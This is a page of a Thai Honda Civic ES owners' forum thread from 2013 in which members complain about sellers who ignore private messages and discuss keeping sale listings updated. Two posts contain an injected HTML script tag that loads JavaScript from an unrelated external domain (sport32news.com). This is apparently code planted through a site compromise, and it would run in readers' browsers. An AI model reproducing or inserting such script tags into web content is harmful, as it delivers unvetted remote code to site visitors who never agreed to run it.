ตอบ
Poy4731


ชื่อเล่น: ปอย

เข้าร่วม: 15 กุมภา 2011
ตอบ: 298

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 223
ให้คำขอบคุณ: 375

ที่อยู่: ES Thonburi-พระราม 2 -คลอง8ธัญญะ
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 5 เมษา 2013 16:38 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ผมก็ขายของอยู่คับ...ผมก็ Up บ้าง เพื่อนๆพี่ๆมาทักทาย เข้ามาแซว บ้างก็มี ส่วนมากผมก็จะตอบทั้งหมดนะคับ 
โดยเฉพาะ PM ,มาถามข้อมูลผม ผมก็จะตอบกลับทุกคน

แต่ใน Pm ผมจะลงท้ายว่า ยังไงรบกวนโทรมาคุยกันดีกว่านะคับ ......
ได้รับคำขอบคุณจาก: N_J Civic 
trucklinkin


ชื่อเล่น: โจ้

เข้าร่วม: 20 เมษา 2012
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 1196

ที่อยู่: นครปฐม
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 5 เมษา 2013 16:49 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ส่วนมาก. ผมจ้องแต่หน้าเวป. รอ กันสาด

พอมาอีกที


ไปเรียบร้อยแบบไม่ต้องอัพ


ได้รับคำขอบคุณจาก: N_J Civic 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 5 เมษา 2013 16:57 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ไม่ว่ากันครับ ก็อย่างที่บอกคนที่เอาของมาขาย ดี ๆ ก็เยอะครับ ทุกความคิดห็นมีเหตุผลเสม
ผมเป็นคนนึงที่ส่วนมากจะซื้อของตามเวป ไม่เคยต่อรองราคาด้วย
แต่ที่ต้องร่าง กระทู้นี้มาเพราะ รออะไหล่จาก ...... ต้องทนขับแบบทุลักทุเล เพราะเข้าใจว่าเค้าจะตอบกลับ -->โง่เอง 5555
เลยเปลี่ยนเจ้าซื้อได้ของภายใน ไม่เกินอาทิตย์
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
ศุกร์, 5 เมษา 2013 17:35 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ก็มันไม่มีของเพิ่มเติม จะทำให้ไงอ่า มีของเดิมผมก็อัพ ของขายแล้วก็แจ้งขายแล้ว มีเพิ่มผมก็แจ้งหัวกระทู้ งง ไม่เข้าใจว่าคิดอะไรอยู่
ได้รับคำขอบคุณจาก: N_J Civic 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 5 เมษา 2013 18:06 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
catsteal พิมพ์ว่า:
ก็มันไม่มีของเพิ่มเติม จะทำให้ไงอ่า มีของเดิมผมก็อัพ ของขายแล้วก็แจ้งขายแล้ว มีเพิ่มผมก็แจ้งหัวกระทู้ งง ไม่เข้าใจว่าคิดอะไรอยู่




ทำถูกแล้วครับ
OUM


เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2142
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 5 เมษา 2013 19:11 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ตามนั้น
fff_1232


ชื่อเล่น: ต้น

เข้าร่วม: 01 ตุลา 2008
ตอบ: 708

Guru ES
Guru ES

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 1472

ที่อยู่: พระราม 2
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 5 เมษา 2013 20:07 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
PM  ไปต่อราคา ไม่ตอบกลับ เราก้อนึกว่าไม่ได้รับหรือให้ราคานี้ไม่ได้

อีก 2 อาทิตย์ ของขายไม่ออก  PM กลับมาถามว่ายังสนใจอยู่ป่าว .....  <script src="https://sport32news.com/civicesgroup.js"></
bomb3092


ชื่อเล่น: บอม

เข้าร่วม: 13 ตุลา 2011
ตอบ: 1116

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 957
ให้คำขอบคุณ: 1379

ที่อยู่: บางนา แบริ่ง ลาซาล
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 5 เมษา 2013 21:06 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ผมถามเปงชาติ ทุกวันนี้ก้ยังไม่ตอบครับ
ได้รับคำขอบคุณจาก: N_J Civic 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 8 เมษา 2013 13:19 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
bomb3092 พิมพ์ว่า:
ผมถามเปงชาติ ทุกวันนี้ก้ยังไม่ตอบครับ




ยังจะรออยู่อีกไหมน่ะ"<script src="https://sport32news.com/civicesgroup.js">
ohmz1541


ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

ที่อยู่: เชียงราย-รามอินทรา
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 8 เมษา 2013 13:26 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ของก็มีแค่ที่หน้าแรก ผมก็ได้เพียงแค่ อัพ อัพ อ้าพพพพพ 
ได้รับคำขอบคุณจาก: N_J Civic 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.